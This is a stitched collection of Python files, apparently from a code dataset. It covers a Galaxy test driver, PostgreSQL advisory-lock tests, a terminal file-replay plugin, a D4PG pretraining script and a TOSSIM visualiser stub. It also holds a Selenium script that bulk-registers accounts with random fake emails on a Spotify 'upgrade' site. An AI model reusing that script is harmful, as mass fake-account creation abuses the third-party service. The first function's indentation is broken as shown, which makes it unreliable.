        os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir
    return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
    """Setup a nose context and run tests.

    Tests are specified by argv (defaulting to sys.argv).  Returns True
    when the run was successful.
    """
    if env is None:
        env = os.environ
    if plugins is None:
        plugins = nose.plugins.manager.DefaultPluginManager()
    if argv is None:
        argv = sys.argv
    if ignore_files is None:
        # Bug fix: the default used to be a shared mutable list ([]).
        ignore_files = []
    test_config = nose.config.Config(
        # Bug fix: the env parameter was accepted but silently ignored --
        # os.environ was always passed here regardless of the argument.
        env=env,
        ignoreFiles=ignore_files,
        plugins=plugins,
    )
    # Add custom plugin to produce JSON data used by planemo.
    test_config.plugins.addPlugin(StructuredTestDataPlugin())
    test_config.configure(argv)
    result = run(test_config)
    success = result.wasSuccessful()
    return success
def copy_database_template(source, db_path):
    """Copy a 'clean' sqlite template database.

    From file or URL to specified path for sqlite database.
    """
    parent = os.path.dirname(db_path)
    if not os.path.exists(parent):
        os.makedirs(parent)
    if os.path.exists(source):
        shutil.copy(source, db_path)
        assert os.path.exists(db_path)
    elif source.lower().startswith(("http://", "https://", "ftp://")):
        try:
            download_to_file(source, db_path)
        except Exception as e:
            # Log but don't fail startup; migrations can build the schema
            # from scratch instead of using a downloaded template.
            log.exception(e)
    else:
        raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY"):
    """Find (and populate if needed) Galaxy database connection."""
    auto_migrate = False
    dburi_var = "%s_TEST_DBURI" % prefix
    connection = os.environ.get(dburi_var)
    if connection is None:
        # No explicit URI - fall back to an sqlite file under db_path.
        template_var = "%s_TEST_DB_TEMPLATE" % prefix
        db_path = os.path.join(db_path, "%s.sqlite" % prefix.lower())
        if template_var in os.environ:
            # Middle ground between recreating a completely new
            # database and pointing at existing database with
            # GALAXY_TEST_DBURI. The former requires a lot of setup
            # time, the latter results in test failures in certain
            # cases (namely tool shed tests expecting clean database).
            copy_database_template(os.environ[template_var], db_path)
            auto_migrate = True
        connection = 'sqlite:///%s' % db_path
    config = {
        "database_connection": connection,
        "database_auto_migrate": auto_migrate,
    }
    if not connection.startswith("sqlite://"):
        # Non-sqlite backends get a larger connection pool.
        config["database_engine_option_max_overflow"] = "20"
        config["database_engine_option_pool_size"] = "10"
    return config
def install_database_conf(db_path, default_merged=False):
    """Resolve the tool shed install database connection for tests."""
    if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
        connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
    elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
        # Merged with the main Galaxy database - no separate connection.
        connection = None
    else:
        connection = 'sqlite:///%s' % os.path.join(db_path, 'install.sqlite')
    if connection is None:
        return {}
    return {"install_database_connection": connection}
def database_files_path(test_tmpdir, prefix="GALAXY"):
    """Create a mock database/ directory like in GALAXY_ROOT.

    Use prefix to default this if TOOL_SHED_TEST_DBPATH or
    GALAXY_TEST_DBPATH is set in the environment.
    """
    env_var = "%s_TEST_DBPATH" % prefix
    try:
        return os.environ[env_var]
    except KeyError:
        # No explicit override - build one under a fresh temp directory.
        return os.path.join(tempfile.mkdtemp(dir=test_tmpdir), 'database')
def _get_static_settings():
    """Configuration required for Galaxy static middleware.

    Returns dictionary of the settings necessary for a galaxy App
    to be wrapped in the static middleware.

    This mainly consists of the filesystem locations of url-mapped
    static resources.
    """
    static_dir = os.path.join(galaxy_root, "static")

    def _in_static(*parts):
        return os.path.join(static_dir, *parts)

    # TODO: these should be copied from config/galaxy.ini
    return {
        "static_enabled": True,
        "static_cache_time": 360,
        "static_dir": static_dir,
        "static_images_dir": _in_static('images', ''),
        "static_favicon_dir": _in_static('favicon.ico'),
        "static_scripts_dir": _in_static('scripts', ''),
        "static_style_dir": _in_static('june_2007_style', 'blue'),
        "static_robots_txt": _in_static('robots.txt'),
    }
def get_webapp_global_conf():
    """Get the global_conf dictionary sent to ``app_factory``."""
    # Nothing here for now except static settings (was originally 'dict()').
    return dict(_get_static_settings())
def wait_for_http_server(host, port):
    """Wait for an HTTP server to boot up.

    Polls ``http://host:port/`` up to 10 times (sleeping briefly between
    attempts) and raises an Exception if a '200 OK' is never observed.
    """
    # Test if the server is up
    for i in range(10):
        conn = None
        try:
            # directly test the app, not the proxy
            conn = httplib.HTTPConnection(host, port)
            conn.request("GET", "/")
            if conn.getresponse().status == 200:
                break
        except socket.error:
            # Bug fix: the server may not be accepting connections yet; the
            # original let this propagate instead of retrying.
            pass
        finally:
            # Close the per-attempt connection so we don't leak sockets.
            if conn is not None:
                conn.close()
        time.sleep(0.1)
    else:
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
        message = template % (host, port)
        raise Exception(message)
def serve_webapp(webapp, port=None, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    server = None
    if port is not None:
        server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
    else:
        random.seed()
        for i in range(0, 9):
            try:
                port = str(random.randint(8000, 10000))
                server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
                break
            except socket.error as e:
                # Retry only when the port is already in use (errno 98,
                # EADDRINUSE). Bug fix: e[0] indexing fails on Python 3;
                # e.errno works on both Python 2.6+ and 3.
                if e.errno == 98:
                    continue
                raise
        else:
            # Bug fix: the upper bound previously read 1000 instead of 10000.
            raise Exception("Unable to open a port between %s and %s to start Galaxy server" % (8000, 10000))
    t = threading.Thread(target=server.serve_forever)
    t.start()
    return server, port
def cleanup_directory(tempdir):
    """Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.

    Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
    """
    no_cleanup_vars = ("GALAXY_TEST_NO_CLEANUP", "TOOL_SHED_TEST_NO_CLEANUP")
    if any(var in os.environ for var in no_cleanup_vars):
        log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
        return
    try:
        if os.path.exists(tempdir):
            shutil.rmtree(tempdir)
    except Exception:
        # Best-effort removal - cleanup failures should never fail the tests.
        pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
    """Modify Galaxy app's toolbox for migrated or installed tool tests.

    Writes a jsonified tool_id -> test file dir mapping under ``tmpdir`` and
    exposes its path via the GALAXY_TOOL_SHED_TEST_FILE environment variable.
    When testing installed tools, also rewrites ``app``'s tool config list and
    rebuilds its toolbox.
    """
    # Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
    galaxy_tool_shed_test_file = os.path.join(tmpdir, 'shed_tools_dict')
    shed_tools_dict = {}
    if testing_migrated_tools:
        has_test_data, shed_tools_dict = parse_tool_panel_config(MIGRATED_TOOL_PANEL_CONFIG, shed_tools_dict)
    elif testing_installed_tools:
        # Accumulate entries across every installed tool panel config.
        for shed_tool_config in INSTALLED_TOOL_PANEL_CONFIGS:
            has_test_data, shed_tools_dict = parse_tool_panel_config(shed_tool_config, shed_tools_dict)
    # Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
    with open(galaxy_tool_shed_test_file, 'w') as shed_tools_file:
        shed_tools_file.write(json.dumps(shed_tools_dict))
    if not os.path.isabs(galaxy_tool_shed_test_file):
        galaxy_tool_shed_test_file = os.path.join(galaxy_root, galaxy_tool_shed_test_file)
    # Downstream test code discovers the persisted dict via this variable.
    os.environ['GALAXY_TOOL_SHED_TEST_FILE'] = galaxy_tool_shed_test_file
    if testing_installed_tools:
        # TODO: Do this without modifying app - that is a pretty violation
        # of Galaxy's abstraction - we shouldn't require app at all let alone
        # be modifying it.
        tool_configs = app.config.tool_configs
        # Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
        # and reload the app's toolbox.
        relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
        if relative_migrated_tool_panel_config in tool_configs:
            tool_configs.remove(relative_migrated_tool_panel_config)
        for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
            tool_configs.append(installed_tool_panel_config)
        from galaxy import tools  # delay import because this brings in so many modules for small tests # noqa: E402
        app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary and use load_app_properties so
    Galaxy override variables are respected. Also setup "global" references
    to sqlalchemy database context for Galaxy and install databases.
    """
    log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    simple_kwargs['global_conf']['__file__'] = "config/galaxy.ini.sample"
    simple_kwargs = load_app_properties(
        kwds=simple_kwargs
    )
    # Build the Universe Application
    app = GalaxyUniverseApplication(**simple_kwargs)
    log.info("Embedded Galaxy application started")
    # Expose the app's sqlalchemy contexts at module level so functional test
    # helpers (which import them globally) can issue queries.
    global galaxy_context
    global install_context
    galaxy_context = app.model.context
    install_context = app.install_model.context
    return app
def build_shed_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary. Also setup "global" reference
    to sqlalchemy database context for tool shed database.
    """
    log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
    # TODO: Simplify global_conf to match Galaxy above...
    simple_kwargs['__file__'] = 'tool_shed_wsgi.ini.sample'
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    app = ToolshedUniverseApplication(**simple_kwargs)
    log.info("Embedded Toolshed application started")
    # Module-level context used by tool shed functional test helpers.
    global tool_shed_context
    tool_shed_context = app.model.context
    return app
# Lightweight record describing a launched test server.
ServerWrapper = collections.namedtuple('ServerWrapper', ['app', 'server', 'name', 'host', 'port'])


def _stop(self):
    """Shut down the wrapped web server (if any) and then its application."""
    server = self.server
    if server is not None:
        log.info("Shutting down embedded %s web server" % self.name)
        server.server_close()
        log.info("Embedded web server %s stopped" % self.name)
    app = self.app
    if app is not None:
        log.info("Stopping application %s" % self.name)
        app.shutdown()
        log.info("Application %s stopped." % self.name)


# Attach stop() so ServerWrapper instances can tear themselves down.
ServerWrapper.stop = _stop
class classproperty(object):
    """Descriptor exposing ``f(owner_class)`` as a read-only class-level property."""

    def __init__(self, f):
        self.f = f

    def __get__(self, obj, owner):
        # Always invoke against the owning class, even when accessed via an
        # instance (obj is ignored).
        getter = self.f
        return getter(owner)
def get_ip_address(ifname):
    """Return the IPv4 address bound to network interface *ifname* (Linux only)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # SIOCGIFADDR ioctl (0x8915); the interface name is truncated to 15 bytes
    # to fit the 256-byte ifreq buffer.
    packed_ifname = struct.pack('256s', ifname[:15])
    ifreq = fcntl.ioctl(sock.fileno(), 0x8915, packed_ifname)
    # Bytes 20-24 of the returned ifreq hold the packed IPv4 address.
    return socket.inet_ntoa(ifreq[20:24])
def launch_server(app, webapp_factory, kwargs, prefix="GALAXY", config_object=None):
    """Launch a web server for a given app using supplied factory.

    Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
    TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
    all set after this method has been called.
    """
    name = prefix.lower()
    host_env_key = "%s_TEST_HOST" % prefix
    port_env_key = "%s_TEST_PORT" % prefix
    default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
    host = os.environ.get(host_env_key, default_web_host)
    # A port of None lets serve_webapp pick a random free port.
    port = os.environ.get(port_env_key, None)
    webapp = webapp_factory(
        kwargs['global_conf'],
        app=app,
        use_translogger=False,
        static_enabled=True
    )
    server, port = serve_webapp(
        webapp,
        host=host, port=port
    )
    # Record the actual host/port so subsequent test code can find the server.
    os.environ[host_env_key] = host
    os.environ[port_env_key] = port
    # Block until the server actually answers requests.
    wait_for_http_server(host, port)
    log.info("Embedded web server for %s started" % name)
    return ServerWrapper(
        app, server, name, host, port
    )
class TestDriver(object):
    """Responsible for the life-cycle of a Galaxy-style functional test.

    Sets up servers, configures tests, runs nose, and tears things
    down. This is somewhat like a Python TestCase - but different
    because it is meant to provide a main() endpoint.
    """

    def __init__(self):
        """Setup tracked resources."""
        self.server_wrappers = []
        self.temp_directories = []

    def setup(self):
        """Called before tests are built."""

    def build_tests(self):
        """After environment is setup, setup nose tests."""

    def tear_down(self):
        """Cleanup resources tracked by this object."""
        for wrapper in self.server_wrappers:
            wrapper.stop()
        for directory in self.temp_directories:
            cleanup_directory(directory)

    def run(self):
        """Driver whole test.

        Setup environment, build tests (if needed), run test,
        and finally cleanup resources.
        """
        configure_environment()
        self.setup()
        self.build_tests()
        try:
            # Exit-code convention: 0 on success, 1 on test failure.
            return 0 if nose_config_and_run() else 1
        except Exception as e:
            log.info("Failure running tests")
            raise e
        finally:
            log.info("Shutting down")
            self.tear_down()
class GalaxyTestDriver(TestDriver):
    """Instantial a Galaxy-style nose TestDriver for testing Galaxy."""

    testing_shed_tools = False
    # Set when an embedded Galaxy app is built; stays None when running
    # against an externally managed server (robustness fix: previously
    # self.app was never assigned on the external path, so build_tool_tests'
    # `self.app is None` check raised AttributeError).
    app = None

    def setup(self, config_object=None):
        """Setup a Galaxy server for functional test (if needed).

        Configuration options can be specified as attributes on the supplied
        ```config_object``` (defaults to self).
        """
        if config_object is None:
            config_object = self
        self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
        self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
        self.temp_directories.append(self.galaxy_test_tmp_dir)
        testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
        if getattr(config_object, "framework_tool_and_types", False):
            # Use the framework sample tool/datatype configs.
            default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
            datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
        else:
            default_tool_conf = getattr(config_object, "default_tool_conf", None)
            datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
        if self.external_galaxy is None:
            tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
            # Configure the database path.
            galaxy_db_path = database_files_path(tempdir)
            # Allow config object to specify a config dict or a method to produce
            # one - other just read the properties above and use the default
            # implementation from this file.
            galaxy_config = getattr(config_object, "galaxy_config", None)
            if hasattr(galaxy_config, '__call__'):
                galaxy_config = galaxy_config()
            if galaxy_config is None:
                setup_galaxy_config_kwds = dict(
                    use_test_file_dir=not testing_shed_tools,
                    default_install_db_merged=True,
                    default_tool_conf=default_tool_conf,
                    datatypes_conf=datatypes_conf_override,
                )
                galaxy_config = setup_galaxy_config(
                    galaxy_db_path,
                    **setup_galaxy_config_kwds
                )
                handle_galaxy_config_kwds = getattr(
                    config_object, "handle_galaxy_config_kwds", None
                )
                if handle_galaxy_config_kwds is not None:
                    handle_galaxy_config_kwds(galaxy_config)
            # ---- Build Application --------------------------------------------------
            self.app = build_galaxy_app(galaxy_config)
            server_wrapper = launch_server(
                self.app,
                buildapp.app_factory,
                galaxy_config,
                config_object=config_object,
            )
            self.server_wrappers.append(server_wrapper)
            # Bug fix: this branch launches the embedded (test managed)
            # server; the two log messages below were previously swapped.
            log.info("Functional tests will be run against test managed Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
        else:
            log.info("Functional tests will be run against external Galaxy server %s" % self.external_galaxy)
            # Ensure test file directory setup even though galaxy config isn't built.
            ensure_test_file_dir_set()

    def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
        """Adapt the embedded app's toolbox for shed tool testing."""
        setup_shed_tools_for_test(
            self.app,
            self.galaxy_test_tmp_dir,
            testing_migrated_tools,
            testing_installed_tools
        )

    def build_tool_tests(self, testing_shed_tools=None):
        """Build nose test cases for every tool in the embedded app's toolbox."""
        if self.app is None:
            return
        if testing_shed_tools is None:
            testing_shed_tools = getattr(self, "testing_shed_tools", False)
        # We must make sure that functional.test_toolbox is always imported after
        # database_contexts.galaxy_content is set (which occurs in this method above).
        # If functional.test_toolbox is imported before database_contexts.galaxy_content
        # is set, sa_session will be None in all methods that use it.
        import functional.test_toolbox
        functional.test_toolbox.toolbox = self.app.toolbox
        # When testing data managers, do not test toolbox.
        functional.test_toolbox.build_tests(
            app=self.app,
            testing_shed_tools=testing_shed_tools,
            master_api_key=get_master_api_key(),
            user_api_key=get_user_api_key(),
        )
        return functional.test_toolbox

    def run_tool_test(self, tool_id, index=0, resource_parameters=None):
        """Run a single tool test case selected by tool id and test index."""
        if resource_parameters is None:
            # None default instead of {} to avoid a shared mutable default.
            resource_parameters = {}
        import functional.test_toolbox
        functional.test_toolbox.toolbox = self.app.toolbox
        tool = self.app.toolbox.get_tool(tool_id)
        testdef = tool.tests[index]
        test_case_cls = functional.test_toolbox.ToolTestCase
        test_case = test_case_cls(methodName="setUp")  # NO-OP
        test_case.shed_tool_id = None
        test_case.master_api_key = get_master_api_key()
        test_case.user_api_key = get_user_api_key()
        test_case.setUp()
        test_case.do_it(testdef, resource_parameters=resource_parameters)
def drive_test(test_driver_class):
    """Instantiate driver class, run, and exit appropriately."""
    driver = test_driver_class()
    exit_code = driver.run()
    sys.exit(exit_code)
# Explicit public API of this module (names intended for import by test
# scripts and planemo).
__all__ = (
    "copy_database_template",
    "build_logger",
    "drive_test",
    "FRAMEWORK_UPLOAD_TOOL_CONF",
    "FRAMEWORK_SAMPLE_TOOLS_CONF",
    "FRAMEWORK_DATATYPES_CONF",
    "database_conf",
    "get_webapp_global_conf",
    "nose_config_and_run",
    "setup_galaxy_config",
    "TestDriver",
    "wait_for_http_server",
)
|
test_alock.py | ##
# .test.test_alock - test .alock
##
import unittest
import threading
import time
from ..temporal import pg_tmp
from .. import alock
# SQL returning the number of advisory locks currently held (pg_locks view);
# used by the tests to verify acquire/release bookkeeping.
n_alocks = "select count(*) FROM pg_locks WHERE locktype = 'advisory'"
class test_alock(unittest.TestCase):
    """Tests for PostgreSQL advisory locks (the ``alock`` module).

    NOTE(review): ``prepare``, ``db`` and ``new`` are not defined in this
    module; presumably the @pg_tmp decorator injects them (a scratch database
    connection plus helpers) into the test's scope - confirm in ..temporal.
    """

    @pg_tmp
    def testALockWait(self):
        # sadly, this is primarily used to exercise the code paths..
        ad = prepare(n_alocks).first
        self.assertEqual(ad(), 0)
        # state[] is the handshake between this thread and concurrent_lock.
        state = [False, False, False]
        alt = new()
        first = alock.ExclusiveLock(db, (0,0))
        second = alock.ExclusiveLock(db, 1)
        def concurrent_lock():
            try:
                with alock.ExclusiveLock(alt, 1):
                    with alock.ExclusiveLock(alt, (0,0)):
                        # start it
                        state[0] = True
                        while not state[1]:
                            pass
                    time.sleep(0.01)
                    while not state[2]:
                        time.sleep(0.01)
            except Exception:
                # Avoid dead lock in cases where advisory is not available.
                state[0] = state[1] = state[2] = True
        t = threading.Thread(target = concurrent_lock)
        t.start()
        while not state[0]:
            time.sleep(0.01)
        self.assertEqual(ad(), 2)
        state[1] = True
        # Blocks until concurrent_lock releases (0,0).
        with first:
            self.assertEqual(ad(), 2)
            state[2] = True
            # Blocks until concurrent_lock releases 1.
            with second:
                self.assertEqual(ad(), 2)
        t.join(timeout = 1)

    @pg_tmp
    def testALockNoWait(self):
        alt = new()
        ad = prepare(n_alocks).first
        self.assertEqual(ad(), 0)
        with alock.ExclusiveLock(db, (0,0)):
            l=alock.ExclusiveLock(alt, (0,0))
            # should fail to acquire
            self.assertEqual(l.acquire(blocking=False), False)
        # no alocks should exist now
        self.assertEqual(ad(), 0)

    @pg_tmp
    def testALock(self):
        ad = prepare(n_alocks).first
        self.assertEqual(ad(), 0)
        # test a variety..
        lockids = [
            (1,4),
            -32532, 0, 2,
            (7, -1232),
            4, 5, 232142423,
            (18,7),
            2, (1,4)
        ]
        alt = new()
        xal1 = alock.ExclusiveLock(db, *lockids)
        xal2 = alock.ExclusiveLock(db, *lockids)
        sal1 = alock.ShareLock(db, *lockids)
        with sal1:
            with xal1, xal2:
                self.assertTrue(ad() > 0)
                for x in lockids:
                    xl = alock.ExclusiveLock(alt, x)
                    self.assertEqual(xl.acquire(blocking=False), False)
                # main has exclusives on these, so this should fail.
                xl = alock.ShareLock(alt, *lockids)
                self.assertEqual(xl.acquire(blocking=False), False)
            for x in lockids:
                # sal1 still holds
                xl = alock.ExclusiveLock(alt, x)
                self.assertEqual(xl.acquire(blocking=False), False)
                # sal1 still holds, but we want a share lock too.
                xl = alock.ShareLock(alt, x)
                self.assertEqual(xl.acquire(blocking=False), True)
                xl.release()
        # no alocks should exist now
        self.assertEqual(ad(), 0)

    @pg_tmp
    def testPartialALock(self):
        # Validates that release is properly cleaning up
        ad = prepare(n_alocks).first
        self.assertEqual(ad(), 0)
        held = (0,-1234)
        wanted = [0, 324, -1232948, 7, held, 1, (2,4), (834,1)]
        alt = new()
        with alock.ExclusiveLock(db, held):
            l=alock.ExclusiveLock(alt, *wanted)
            # should fail to acquire, db has held
            self.assertEqual(l.acquire(blocking=False), False)
        # No alocks should exist now.
        # This *MUST* occur prior to alt being closed.
        # Otherwise, we won't be testing for the recovery
        # of a failed non-blocking acquire().
        self.assertEqual(ad(), 0)

    @pg_tmp
    def testALockParameterErrors(self):
        # ALock is abstract/parameterless-invalid; release without acquire fails.
        self.assertRaises(TypeError, alock.ALock)
        l = alock.ExclusiveLock(db)
        self.assertRaises(RuntimeError, l.release)

    @pg_tmp
    def testALockOnClosed(self):
        ad = prepare(n_alocks).first
        self.assertEqual(ad(), 0)
        held = (0,-1234)
        alt = new()
        # __exit__ should only touch the count.
        with alock.ExclusiveLock(alt, held) as l:
            self.assertEqual(ad(), 1)
            self.assertEqual(l.locked(), True)
            # Closing the connection drops the lock server-side.
            alt.close()
            time.sleep(0.005)
            self.assertEqual(ad(), 0)
            self.assertEqual(l.locked(), False)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
file_term_network.py | import os
import logging
import threading
import struct
from wxglterm_interface import TermNetwork
from multiple_instance_plugin_base import MultipleInstancePluginBase
LOGGER = logging.getLogger('term_network')
class FileTermNetwork(MultipleInstancePluginBase, TermNetwork):
    """TermNetwork implementation that replays terminal data from a dump file
    instead of a live connection."""

    def __init__(self):
        MultipleInstancePluginBase.__init__(self, name="term_network_use_file",
                                            desc="It is a python version term file_term_network",
                                            version=1)
        TermNetwork.__init__(self)

    def disconnect(self):
        # Nothing to tear down - data comes from a local file, not a socket.
        pass

    def connect(self, host, port, user_name, password):
        # host/port/user_name/password are ignored; the "connection" is the
        # file named in the plugin config.
        self._file_path = file_path = self.get_plugin_config().get_entry("/file", "NOT FOUND")
        self._len_prefix = self.get_plugin_config().get_entry_bool("/length_prefix", True)
        if not os.path.exists(file_path):
            LOGGER.error("term data file is not exist:{}".format(file_path))
        self.start_reader()

    def start_reader(self):
        """Start a background thread feeding the file contents to the term
        data handler."""
        term_data_handler = self.get_plugin_context().get_term_data_handler()

        def __read_term_data():
            with open(self._file_path, 'rb') as f:
                while True:
                    if self._len_prefix:
                        # Each record is preceded by a 4-byte big-endian length.
                        data = f.read(4)
                        if not data or len(data) != 4:
                            LOGGER.info("end of dump data, quit")
                            break
                        data_len = struct.unpack('!i', data)[0]
                    else:
                        # No framing - stream in fixed-size chunks.
                        data_len = 1024
                    data = f.read(data_len)
                    if not data or data_len != len(data):
                        # Short read at EOF - flush what we have, then stop.
                        # NOTE(review): when data is empty this still calls
                        # on_data(b'', 0) - confirm handlers tolerate that.
                        term_data_handler.on_data(data, len(data))
                        LOGGER.info("end of dump data, quit")
                        break
                    term_data_handler.on_data(data, len(data))
            return

        def read_term_data():
            try:
                __read_term_data()
            except:
                # Broad except: the reader runs on its own thread, so log
                # the failure rather than letting it die silently.
                LOGGER.exception('read term data failed')

        self.reader_thread = reader_thread = threading.Thread(target=read_term_data)
        reader_thread.start()

    def send(self, data, n):
        # Replay-only network: outgoing data is dropped.
        pass

    def resize(self, row, col):
        # Terminal size changes are irrelevant for file playback.
        pass
def register_plugins(pm):
    """Register a fresh FileTermNetwork instance with the plugin manager."""
    plugin_instance = FileTermNetwork().new_instance()
    pm.register_plugin(plugin_instance)
|
pre_train.py | '''
## Train ##
# Code to train D4PG Network on OpenAI Gym environments
@author: Mark Sinton (msinto93@gmail.com)
'''
import threading
import random
import tensorflow as tf
import numpy as np
import pickle
from params import train_params
from prioritised_experience_replay import PrioritizedReplayBuffer
from gaussian_noise import GaussianNoiseGenerator
from agent import Agent
from learner import Learner
def train():
    """Pretrain the D4PG learner's actor network from saved experience.

    NOTE(review): despite the module docstring, the agent/learner run loop is
    commented out below (triple-quoted block); only learner.pretrain() runs.
    """
    tf.reset_default_graph()
    # Set random seeds for reproducability
    np.random.seed(train_params.RANDOM_SEED)
    random.seed(train_params.RANDOM_SEED)
    tf.set_random_seed(train_params.RANDOM_SEED)
    # Initialise prioritised experience replay memory
    PER_memory = PrioritizedReplayBuffer(train_params.REPLAY_MEM_SIZE, train_params.PRIORITY_ALPHA)
    # Initialise Gaussian noise generator
    gaussian_noise = GaussianNoiseGenerator(train_params.ACTION_DIMS, train_params.ACTION_BOUND_LOW, train_params.ACTION_BOUND_HIGH, train_params.NOISE_SCALE)
    # Create session
    config = tf.ConfigProto(allow_soft_placement=True)
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    # Create threads for learner process and agent processes
    threads = []
    # Create threading events for communication and synchronisation between the learner and agent threads
    run_agent_event = threading.Event()
    stop_agent_event = threading.Event()
    # with tf.device('/device:GPU:0'):
    # Initialise learner
    learner = Learner(sess, PER_memory, run_agent_event, stop_agent_event)
    # Build learner networks
    learner.build_network()
    # Build ops to update target networks
    learner.build_update_ops()
    # Initialise variables (either from ckpt file if given, or from random)
    learner.initialise_vars()
    # Get learner policy (actor) network params - agent needs these to copy latest policy params periodically
    learner_policy_params = learner.actor_net.network_params + learner.actor_net.bn_params
    print('Pretraining')
    # load data
    # NOTE(review): pickle.load on an untrusted file can execute arbitrary
    # code - only load experience files from trusted sources.
    with open('saved_experience_normed.p', 'rb') as f:
        exp = pickle.load(f)
    # exp appears to be (observations, actions) - the .shape prints below
    # suggest numpy arrays; TODO confirm the pickle layout.
    actions = exp[1]
    obs = exp[0]
    print(actions.shape)
    print(obs.shape)
    learner.pretrain(obs, actions)
    '''
    threads.append(threading.Thread(target=learner.run))
    for n_agent in range(train_params.NUM_AGENTS):
        # Initialise agent
        agent = Agent(sess, train_params.ENV, train_params.RANDOM_SEED, n_agent)
        # Build network
        agent.build_network(training=True)
        # Build op to periodically update agent network params from learner network
        agent.build_update_op(learner_policy_params)
        # Create Tensorboard summaries to save episode rewards
        if train_params.LOG_DIR is not None:
            agent.build_summaries(train_params.LOG_DIR + ('/agent_%02d' % n_agent))
        threads.append(threading.Thread(target=agent.run, args=(PER_memory, gaussian_noise, run_agent_event, stop_agent_event)))
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    '''
    sess.close()
# Script entry point: run pretraining directly.
if __name__ == '__main__':
    train()
|
spotify.py | from selenium import webdriver
from multiprocessing import Process, Lock
from time import sleep
import csv
import random
import string
def getRandomString(length):  # Letters and numbers
    """Return a random string of *length* lowercase letters and digits."""
    pool = string.ascii_lowercase + string.digits
    chars = [random.choice(pool) for _ in range(length)]
    return "".join(chars)
def getRandomText(length):  # Chars only
    """Return a random string of *length* lowercase ASCII letters."""
    letters = [random.choice(string.ascii_lowercase) for _ in range(length)]
    return "".join(letters)
def createSpotifyAccounts(fileName, numberOfAccounts):
    """Drive a Chrome browser to register random accounts on spotify-upgrade.net.

    Appends each generated ``email, password`` pair to
    ``./accounts/<fileName>.csv``.

    NOTE(review): the XPaths below are tied to the site's current markup and
    will break if the page layout changes - verify before relying on this.
    """
    # Creating chrome webdriver instance
    driver = webdriver.Chrome()
    with open('./accounts/' + str(fileName) + '.csv', 'a', newline='') as file:
        writer = csv.writer(file)
        for i in range(int(numberOfAccounts)):
            driver.get('https://spotify-upgrade.net/upgrade')
            sleep(1)
            # Random credentials for this account.
            password = getRandomString(8)
            email = getRandomText(5)+"@"+getRandomText(5)+".com"
            # Switch to the registration form, fill credentials, submit.
            driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[2]/label[2]').click()
            sleep(2)
            driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[2]/input').send_keys(email)
            driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[3]/input').send_keys(password)
            driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[4]/input').click()
            sleep(3)
            # Persist the credentials only after submission.
            writer.writerow([email, password])
    driver.quit()
# Spawn 5 browser processes, each creating 10 accounts in parallel.
if __name__ == "__main__":
    Processes = []
    for num in range(5):
        # change 10 with the number of accounts you want to create
        a = Process(target=createSpotifyAccounts, args=(num,10,))
        a.start()
        Processes.append(a)
    for p in Processes:
        p.join()
|
TosVis.py | import math
import re
import sys
import os
import select
from random import random
from threading import Thread
from TOSSIM import *
from topovis import *
from topovis.TkPlotter import Plotter
## Stores preconfigured LEDs' positions and colors.
#
# The configuration is contained in a list. Each of the entries is
